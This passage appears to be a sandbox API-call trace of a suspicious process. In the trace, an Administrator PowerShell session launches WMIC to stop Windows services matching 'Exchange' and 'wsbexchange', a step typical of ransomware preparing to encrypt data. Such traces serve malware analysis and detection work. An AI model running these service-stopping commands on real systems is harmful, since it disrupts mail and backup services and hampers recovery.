dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4ccdc3c | out: lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%Exchange%%'\" call stopservice", lpProcessInformation=0x4ccdc3c*(hProcess=0x958, hThread=0x954, dwProcessId=0xff8, dwThreadId=0x11b8)) returned 1 [0309.546] CloseHandle (hObject=0x954) returned 1 [0309.546] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e680, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e680) returned 0x4550 [0309.547] GetCurrentProcess () returned 0xffffffff [0309.547] GetCurrentProcess () returned 0xffffffff [0309.547] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x958, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x8b0e904, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x8b0e904*=0x954) returned 1 [0309.547] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0e8fc*=0x954, lpdwindex=0x8b0e71c | out: lpdwindex=0x8b0e71c) returned 0x0 [0311.526] CloseHandle (hObject=0x954) returned 1 [0311.526] GetExitCodeProcess (in: hProcess=0x958, lpExitCode=0x8b0e968 | out: lpExitCode=0x8b0e968*=0x0) returned 1 [0311.526] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0311.535] CloseHandle (hObject=0x958) returned 1 [0311.536] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea8c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea8c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc3, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0311.536] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc3, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0311.536] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc1, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc1, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0311.536] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc1, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0311.536] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc2, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc2, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0311.537] SetEvent (hEvent=0x938) returned 1 [0311.537] SetEvent (hEvent=0x92c) returned 1 [0311.537] SetEvent (hEvent=0x934) returned 1 [0311.537] SetEvent (hEvent=0x930) returned 1 [0311.537] SetEvent (hEvent=0x948) returned 1 [0311.537] SetEvent (hEvent=0x93c) returned 1 [0311.537] SetEvent (hEvent=0x940) returned 1 [0311.537] SetEvent (hEvent=0x944) returned 1 [0311.537] SetEvent (hEvent=0x950) returned 1 [0311.537] SetEvent (hEvent=0x94c) returned 1 [0311.538] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0ef8c*=0x84c, lpdwindex=0x8b0edac | out: lpdwindex=0x8b0edac) returned 0x0 [0311.541] SetThreadUILanguage (LangId=0x0) returned 0x6f0409 [0311.542] CoCreateGuid (in: pguid=0x8b0edf8 | out: pguid=0x8b0edf8*(Data1=0x77103990, Data2=0x4e8, Data3=0x47c6, Data4=([0]=0x88, [1]=0x62, [2]=0x87, [3]=0x75, [4]=0x69, [5]=0xe2, [6]=0xd9, [7]=0xd9))) returned 0x0 [0311.543] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0edd8 | out: lpPerformanceCount=0x8b0edd8*=40657721319) returned 1 [0311.543] AmsiOpenSession () returned 0x0 [0311.543] AmsiScanString () returned 0x80070015 [0311.549] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0eda0 | out: lpPerformanceCount=0x8b0eda0*=40658340264) returned 1 [0311.549] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0eb98, nSize=0xbc | out: lpBuffer="ҳ\x05") returned 0x0 [0311.549] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc9, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0311.549] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc2, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0311.549] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc9, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc9, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0311.549] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xca, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0311.549] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc9, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0311.549] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xca, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xca, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0311.550] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0e7a0, nSize=0xbc | out: lpBuffer="ሰғ") returned 0x0 [0311.550] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x8b0e6bc, nSize=0xbc | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0311.550] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a8, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0311.550] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8770c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0311.551] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6b0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0311.551] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0311.551] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0311.551] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0311.551] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x2410, ftCreationTime.dwLowDateTime=0xac5d590c, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xac5d590c, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xac5d590c, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0311.551] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0311.551] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0311.551] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0311.552] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0311.552] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0311.552] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0311.552] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0311.552] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0311.552] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0311.552] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0311.552] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xebb5ab66, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xebb5ab66, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0311.552] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0311.552] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0311.553] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0311.553] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0311.553] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\system32\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0311.553] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0311.553] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0311.553] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0311.553] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0311.553] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0311.553] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x7000)) returned 1 [0311.553] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0311.553] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0311.553] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0311.553] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0311.554] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0311.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0311.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0311.554] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0311.554] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0311.554] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0311.554] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb288124d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb288124d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x8000)) returned 1 [0311.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0311.554] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0311.554] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0311.554] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0311.554] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc58640, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fc58640, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fc58640, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5ec00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x7e1c620 [0311.555] FindNextFileW (in: hFindFile=0x7e1c620, lpFindFileData=0x8b0e57c | out: lpFindFileData=0x8b0e57c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0311.555] FindClose (in: hFindFile=0x7e1c620 | out: hFindFile=0x7e1c620) returned 1 [0311.555] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0311.555] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0311.555] GetFileAttributesW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")) returned 0x20 [0311.555] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0eafc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0eafc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xcb, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0311.555] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xca, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0311.555] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xcb, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xcb, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0311.556] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e644, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e644) returned 0x4550 [0311.556] GetConsoleWindow () returned 0x302b8 [0311.559] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e410, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0311.561] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0311.561] CoTaskMemAlloc (cb=0x804) returned 0x7e29450 [0311.561] GetConsoleTitleW (in: lpConsoleTitle=0x7e29450, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x49 [0311.562] CoTaskMemFree (pv=0x7e29450) [0311.562] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%wsbexchange%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x8b0e6c0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4cdd2e4 | out: lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%wsbexchange%%'\" call stopservice", lpProcessInformation=0x4cdd2e4*(hProcess=0xab4, hThread=0xab0, dwProcessId=0xffc, dwThreadId=0x1014)) returned 1 [0311.576] CloseHandle (hObject=0xab0) returned 1 [0311.577] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e680, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e680) returned 0x4550 [0311.577] GetCurrentProcess () returned 0xffffffff [0311.577] GetCurrentProcess () returned 0xffffffff [0311.577] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xab4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x8b0e904, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x8b0e904*=0xab0) returned 1 [0311.577] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0e8fc*=0xab0, lpdwindex=0x8b0e71c | out: lpdwindex=0x8b0e71c) returned 0x0 [0313.789] CloseHandle (hObject=0xab0) returned 1 [0313.789] GetExitCodeProcess (in: hProcess=0xab4, lpExitCode=0x8b0e968 | out: lpExitCode=0x8b0e968*=0x0) returned 1 [0313.789] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0313.899] CloseHandle (hObject=0xab4) returned 1 [0313.899] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea8c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea8c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xcb, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0313.900] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xcb, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0313.900] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc9, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc9, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0313.900] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc9, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0313.900] EtwEventActivityIdControl (in: ControlCode=0x2, 